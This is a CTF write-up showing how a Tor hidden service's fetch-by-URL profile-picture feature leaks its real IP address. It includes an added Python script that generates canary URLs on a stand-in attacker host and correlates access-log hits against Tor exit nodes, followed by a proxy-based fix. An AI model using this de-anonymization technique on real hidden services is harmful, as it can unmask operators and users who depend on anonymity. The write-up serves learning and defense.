Nuit Du Hack 2014 Quals CTF WriteUp: Onion Rings (aka Misc 150 aka Funion Rings)
Just finished Nuit Du Hack Quals, and I wanted to write up a really fun, simple web and Tor challenge, fantastic for learning! Putting theory into practice, this is a great practical example of a Tor hidden service correlation attack: make the hidden service send a request you can observe, then correlate that request with the real server behind it. The challenge started simply enough, only giving you a link to a Tor hidden service: http://mq72g4732yorslzf.onion/ (with no https though [sadface]...). If you're new to Tor, the quickest way to get on the network, and thus access .onion domains, is to use the Tor Browser Bundle. Once we have our Tor browser running, it's easy to see the .onion site in question is a black market site:
The site also features the ability to change your profile picture, not just through uploading a photo but also by giving it a URL:
If you give it the URL of a site you control, you will see the hidden service's web server fetch that URL itself, and the request shows up in your HTTP access log (/var/log/httpd/access_log for Apache on RHEL-style systems; Debian-style installs use /var/log/apache2/access.log) with the client address of whatever made the fetch:
212.xxx.xxx.197 - - [05/Apr/2014:21:00:45 +0000] "GET /lol.gif HTTP/1.1" 200 59554 "-" "-"
This is a repeatable process, and the source IP tells the whole story: the hidden service fetches the profile picture from its real server without routing that outbound traffic through the Tor network, so the request arrives from the server's public address rather than from a Tor exit node. If we browse straight to the disclosed IP over the clearnet, the same site comes up, confirming the leak. On this new page we can easily spot the flag with ctrl+f "flag", and voilà, a fast challenge down:
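To make the correlation step concrete, here is an added example (my own code, not part of the original write-up or the challenge) that automates the check described above: it builds a uniquely tokenized canary URL to hand to the profile-picture form, parses Apache combined-format access log lines, ties each callback hit back to the token that caused it, and flags hits that did not come from a Tor exit node as the hidden service's real origin address. The log lines, the IP addresses (RFC 5737 documentation ranges) and the exit-node list are all constructed for the example; in practice you would load the current exit list from the Tor Project's bulk exit list rather than hard-code it.

```python
import re
import secrets
from collections import defaultdict

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Path shape of the canary image we submit; the token lets us tell
# which submission produced which log hit when testing repeatedly.
CANARY_RE = re.compile(r'/canary-(?P<token>[0-9a-f]{16})\.gif')


def make_canary_url(base, token=None):
    """Return (url, token) for a fresh canary image under our own host."""
    token = token or secrets.token_hex(8)          # 16 hex chars
    return f"{base.rstrip('/')}/canary-{token}.gif", token


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def correlate(lines, tor_exits):
    """Map canary token -> [(client_ip, verdict)] for every canary hit.

    A hit from a Tor exit means the service fetched through Tor (no leak).
    A hit from any other address is the fetcher's own public IP, i.e. the
    hidden service's real origin.
    """
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = CANARY_RE.search(rec["path"])
        if m is None:
            continue
        verdict = "tor-exit" if rec["ip"] in tor_exits else "direct (origin leaked)"
        hits[m.group("token")].append((rec["ip"], verdict))
    return dict(hits)


def leaked_origins(hits):
    """Set of client IPs that fetched a canary without going through Tor."""
    return {ip for entries in hits.values() for ip, verdict in entries
            if verdict.startswith("direct")}


# Constructed sample log (documentation IP ranges, not real hosts).
SAMPLE_LOG = [
    '203.0.113.197 - - [05/Apr/2014:21:00:45 +0000] '
    '"GET /canary-0123456789abcdef.gif HTTP/1.1" 200 59554 "-" "-"',
    '198.51.100.7 - - [05/Apr/2014:21:01:10 +0000] '
    '"GET /canary-fedcba9876543210.gif HTTP/1.1" 200 59554 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [05/Apr/2014:21:02:00 +0000] '
    '"GET /index.html HTTP/1.1" 200 1234 "-" "curl/7.35.0"',
]

# Constructed stand-in for the Tor exit list (assumption: only this one exit).
TOR_EXITS = {"198.51.100.7"}


if __name__ == "__main__":
    url, token = make_canary_url("http://attacker.example")
    print("submit this as the profile picture URL:", url)
    hits = correlate(SAMPLE_LOG, TOR_EXITS)
    for tok, entries in hits.items():
        for ip, verdict in entries:
            print(f"token {tok}: {ip} -> {verdict}")
    print("leaked origin IPs:", sorted(leaked_origins(hits)))
```

The fix on the service side is to send every outbound fetch through the local Tor SOCKS port; with Python's `requests`, for instance, `proxies={"http": "socks5h://127.0.0.1:9050", "https": "socks5h://127.0.0.1:9050"}` does that, and the `socks5h` scheme matters because it resolves DNS through the proxy too, so a name lookup cannot leak the origin even when the HTTP request does not.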
I also liked the research that went into solving this challenge. Along the way I read some really good articles on the theory of hidden services, how to configure a Tor hidden service, and a paper on the Tor Rendezvous Protocol.
I also really enjoyed the flavor texts throughout the Nuit Du Hack CTF; they made it really entertaining while playing. Here's another gem they cloned for content in the CTF: http://www.funnyordie.com/articles/8b428100e2/how-to-hack-chipotle